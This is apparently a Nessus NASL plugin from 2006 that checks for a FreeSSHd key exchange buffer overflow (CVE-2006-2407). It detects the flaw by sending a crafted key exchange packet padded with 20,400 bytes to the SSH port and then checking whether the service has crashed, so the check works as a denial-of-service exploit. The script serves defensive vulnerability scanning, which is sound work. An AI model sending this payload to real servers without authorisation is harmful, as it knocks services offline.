#
# Script Written By Ferdy Riphagen
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#

if (description) {
 script_id(200012);
 script_version("$Revision: 1.0 $");

 script_cve_id("CVE-2006-2407");
 script_bugtraq_id(17958);

 name["english"] = "FreeSSHD Key Exchange Buffer Overflow";
 script_name(english:name["english"]);

desc["english"] = "
Synopsis :

A vulnerable version of FreeSSHd is installed on 
the remote host.

Description :

The version installed does not validate key exchange strings
send by a SSH client. This results in a buffer overflow
and possible a compromise of the host if the client is 
sending a long key exchange string. 

See also :

http://secunia.com/advisories/19846
http://www.freesshd.com/?ctt=download

Solution :

Upgrade to the latest release. 
See second url in the 'See also' section.

Note :

At this point the FreeSSHD Service is reported down.
You should start it manualy again.

Risk factor :

Critical / CVSS Base Score : 10
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)";
 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for a buffer overflow in FreeSSHd";
 script_summary(english:summary["english"]);

 script_category(ACT_DENIAL);
 script_family(english:"Gain root remotely");
 script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");

 script_dependencies("find_service.nes");
 script_require_ports("Services/ssh", 22);
 exit(0);
}

include("misc_func.inc");

port = get_kb_item("Services/ssh");
if (!port) port = 22;

soc = open_sock_tcp(port);
if (!soc) exit(0);

banner = recv(socket:soc, length:128);
if (egrep(pattern:"SSH.+WeOnlyDo", string:banner)) {
 
 ident = "SSH-2.0-OpenSSH_4.2p1";
 exp = ident + raw_string(
		0x0a, 0x00, 0x00, 0x4f, 0x04, 0x05, 
		0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xde)
		+ crap(length:20400);

 send(socket:soc, data:exp);
 recv(socket:soc, length:1024);
 close(soc);

 soc = open_sock_tcp(port);
 if (soc) {
  recv = recv(socket:soc, length:128);
  close (soc);
 } 
 if (!soc || (!strlen(recv))) {
  security_hole(port);
 }
}
exit(0);
